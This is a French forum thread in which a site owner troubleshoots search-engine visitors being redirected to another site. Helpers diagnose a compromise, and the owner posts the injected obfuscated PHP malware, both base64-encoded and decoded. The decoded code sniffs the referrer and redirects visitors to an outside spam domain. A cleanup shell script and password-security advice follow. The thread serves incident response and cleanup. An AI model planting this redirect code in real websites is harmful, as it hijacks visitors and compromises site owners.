Moteur de recherche qui change l'url de mon site ?

Bonjour à tous,

Je sais bien que cette partie du forum traite de l'accessibilité, et j'ai un gros problème d'accessibilité actuellement, mais un vrai, pas seulement une image sans alt.

Depuis les moteurs de recherche, lorsque je recherche "Grid France" (nom de mon site), on trouve bien le bon, la bonne url indiquée, mais quand je clique dessus, là, c'est la catastrophe, je tombe sur un autre site que le mien.

Normalement, je devrais tomber sur http://www.grid-france.fr, mais je tombe sur un site qui est bloqué par le proxy de mon boulot (surement un "bêtise" lien monkeyball.osa.pl).

Qu'est-ce que cela ? Est-ce que vous obtenez la même chose ?

Par exemple, depuis Google : http://www.google.de/search?q=grid+france
Depuis Bing : http://www.bing.com/search?q=grid+france
Depuis Yahoo : http://fr.search.yahoo.com/search?p=grid+france

Est-ce un problème de DNS ? Un problème lié à mon référencement ? Ou encore autre chose inconnu ?

Par avance merci, car je suis perdu !

P.S : Ce n'est pas pour faire de la pub !
Modifié par Super_baloo8 (04 Apr 2012 - 18:07)

T'aurai pas un virus plutôt ?
Aucun soucis pour accéder à ton site.

Super_baloo8 a écrit :
j'ai un gros problème d'accessibilité actuellement, mais un vrai, pas seulement une image sans alt.

Un vrai problème d'accessibilité et pas un petit problème de alt à la con ?
C'est un peu réducteur, voire insultant pour les gens qui font de l'accessibilité du web un enjeu important, et pour certains leur métier à part entière.

Ton problème n'a strictement rien à voir avec la problématique de l'accessibilité du web ou des standards web. Je crois que ça pourrait plutôt venir d'un bon vieux piratage de ton serveur.

Tu peux toujours te connecter à ton FTP ? A l'interface de gestion de ton hébergeur ?

@Kenor, je me rends compte que ça ne m'arrive qu'avec Firefox, depuis Chrome pas de problème.

@Audrasjb, je suis complètement conscient que ça ne relève pas de l'accessibilité tel que décris par ce forum ! Et j'en suis un fervent défenseur moi même, même si ce n'est pas mon métier. J'hésitait entre ce forum, et le Bar pour être honnête)

En étant en déplacement professionnel, je n'ai pas accès à mon serveur (config limité à une connexion d'un IP particulière + connexion que je ne ferais pas depuis ma chambre d'hotel pour des raisons de sécurité sur un réseau non sécurisé).

Mais je n'ai pas vu d'alerte Ossec qui traine indiquant qu'un mot de passe à été modifié, donc à l'état actuel des choses, je ne pense pas avoir eu des accès indésirable au serveur en lui même (pour les DNS, c'est 1and1 qui les gère).

Effectivement ton site a été sûrement infecté, soit un troyen sur ton ordinateur, soit une faille dans le cms que tu utilises (il est bien à jour?).

L'accès direct à ton site via l'url tapée dans la barre d'adresse est OK et via les moteurs de recherche il y a bien redirection : un script (serveur ou JS) infecte ton site, vérifie le referrer et s'il y en a un ou si c'est un moteur de recherche, il redirige sinon non. Pas con (mais ennuyeux).

La faille peut être dans ton CMS, dans ton PC (mot de passe enregistré dans FileZilla ... jamais jamais et plus jamais), chez l'hébergeur (y compris PhpMyAdmin).

Faut que je regarde ça rapidement, malheureusement je ne peux pas avant vendredi soir =(

Mille merci pour vos retour, je vous tiens au courant.

(Pour le CMS, il est maison, et pas disponible sur le net, donc des failles, il peut en avoir, mais pas facilement exploitable).

Pour FileZilla, aiie ... c'est exactement ce que je fais ... pour l'hébergeur, il est admin sur le serveur puisque c'est un mécénat.

Je n'ai toujours pas eu encore l'accès à mon serveur, mais ce soir ça sera résolu, en partie.

Alors, j'ai lu cet article : http://www.mintrix.net/blog/2012/04/04/damn-you-hackers-go-to-hell/

Donc, soit .htaccess, soit php, soit JS.

Vu qu'en désactivant le JS je n'ai plus cette redirection, je parie 90% que c'est là dedans.

Ensuite, il va falloir que j'analyse pour savoir comment il est entrer, pour combler la faille.

Si vous avez des pistes pour faire ce "style" de débuggage, je suis preneur (vais commencer par analyser les traces d'accès log apache, et déterminer depuis quand ça remonte cette histoire).

Je viens de voir un bout de code en ligne sur une page annexe que j'avais faite, et c'est une attaque sur mes fichiers php :

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

Ce qui donne en langage décode :

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location:  http://minkof.sellclassics.com/");
 
exit();
}
}
}
}
}

Visible depuis cette page, c'est n'est pas moi qui avait mis ce bout de code !!!

Pour aider au nettoyage :

http://tech.sarathdr.com/featured/wordpress-hacked-redirect-to-gigop-americanunfinished-com
Modifié par Super_baloo8 (06 Apr 2012 - 17:17)

Problème presque résolu, déjà c'est de nouveau fonctionnel.

Maintenant, il ne manque plus qu'à trouver la raison de ce problème.

Sinon, pour desinfecter, le lien que j'ai indiqué est parfait !

#!/bin/sh
#Commande pour nettoyer : find . -name '*.php' -exec ./clean.sh \{\} \;
#Commande pour supprimer les mauvais fichiers : find . -name '*.hack' -exec rm -f \{\} \;

src=$1.hack
dst=$1

#mv $1 $(echo $1 | sed 's/.php.hack.php.bck/.php/') Pour renommer si on c'est planter ...

mv $dst $src

sed -e 's,eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));,,g' $src > $dst

Hello,

Super_baloo8 a écrit :
Pour FileZilla, aiie ... c'est exactement ce que je fais ... pour l'hébergeur, il est admin sur le serveur puisque c'est un mécénat.

Donc il va falloir commencer par changer tous les mot de passes des sites enregistrés sur Filezilla et ne plus les enregistrer à l'avenir. Filezilla stocke les mots de passe en clair donc il facile pour un programme installé sur ton ordinateur de les récupérer…

Au niveau de filezilla, pour une sécurité idéal, il faut utiliser une clé SSH pour se connecter, le tout en utilisant "Pageant" (putty authentication agent). En gros, vous sélectionnez SFTP - SSH + l'identifiant sur filezilla (aucun mot de passe ni clé SSH à rentrer sur Filezilla), vous vous connectez via Pageant à votre SSH, et il ne vous reste plus qu'à vous connecté à votre FTP via Filezilla.

Merci pour ces détails, utilisant déjà filezilla pour faire du sftp je n'ai plus qu'à modifier la méthode de connexion.

Mais nous avons avancé sur l'analyse, est c'est une attaque XSS on dirait, pas d'accès par les voix officielles, donc une faille quelque part, et maintenant le plus dur est de trouvé où se situe cette faille.

Si vous avez une idée sur la manière de procéder pour voir ses failles, je suis ouvert, mais je ne pense pas que j'obtiendrai de réponse toute faite, sinon ça serait trop simple !

Pour les mots de passe, au mieux, celui qu'il récupère est le mot de passe de l'utilisateur apache, pas de quoi mettre le serveur out, car il faudrait en plus qu'il soit listé dans la liste blanche d'ip pour se connecter (on s'était déjà fait avoir bêtement sur ce point).

Par contre, en poussant une autre analyse en parallèle on s'est rendu compte qu'un tas de connexions depuis des université Française et étrangère scan notre serveur, est-ce une pratique courante des étudiants ? Car ce que l'on s'aperçoit c'est que pratiquement 70% du traffic vient de ces foutus scan et autre tentative d'intrusions. Bon les solutions de bannissement sont en place, mais bordel que c'est lourd, surtout que la plupart ont des scripts connus sans grande possibilité de résultats.

Savez-vous ce qui décide ces gentilles têtes brûle a faire ça ? A part le plaisir!?!!??